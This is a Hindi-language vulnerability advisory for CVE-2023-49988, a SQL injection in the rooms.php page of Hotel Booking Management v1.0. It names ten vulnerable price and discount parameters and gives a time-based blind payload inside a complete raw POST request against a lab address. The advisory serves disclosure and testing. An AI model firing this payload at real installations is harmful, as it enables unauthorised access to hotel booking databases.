
होटल बुकिंग प्रबंधन v1.0 - "npss" पैरामीटर में SQL Injection कमजोरी rooms.php पर
विवरण: Hotel Booking Management के संस्करण 1 में एक SQL Injection भेद्यता मौजूद है। एक दुर्भावनापूर्ण हमलावर, आवास विकल्पों की कीमतों और छूटों को संपादित करते समय कमजोर पैरामीटर npss, dpss, npsd, dpsd, npds, dpds, npdd, dpdd, npdst, या dpdst के माध्यम से MySQL डेटाबेस को SQL कमांड जारी कर सकता है।
भेद्य उत्पाद संस्करण: Hotel Booking Management v1.0 CVE लेखक: Geraldo Alcântara दिनांक: 28/11/2023 पुष्टि तिथि: 19/12/2023 CVE: CVE-2023-49988 परीक्षण किया गया: Windows
इस भेद्यता का शोषण करने के लिए, एक हमलावर /HotelBookingManagement-main/rooms.php पर नेविगेट कर सकता है। आवास विकल्पों की कीमतों और छूटों को संशोधित करते समय npss, dpss, npsd, dpsd, npds, dpds, npdd, dpdd, npdst, या dpdst जैसे पैरामीटर में SQL पेलोड इंजेक्ट करके, हमलावर सिस्टम से समझौता कर सकता है। पेलोड: (select*from(select(sleep(5)))a)
POST /HotelBookingManagement-main/rooms.php HTTP/1.1
Host: 192.168.68.148
Content-Length: 127
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/HotelBookingManagement-main/rooms.php
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=aih2rvevdrpegiqt8nlstav7am
Connection: close
npss=(select*from(select(sleep(5)))a)&dpss=2&npsd=800&dpsd=2&npds=1100&dpds=3&npdd=1500&dpdd=4&npdst=2000&dpdst=13&updateRooms=
खोजकर्ता/श्रेय: Geraldo Alcântara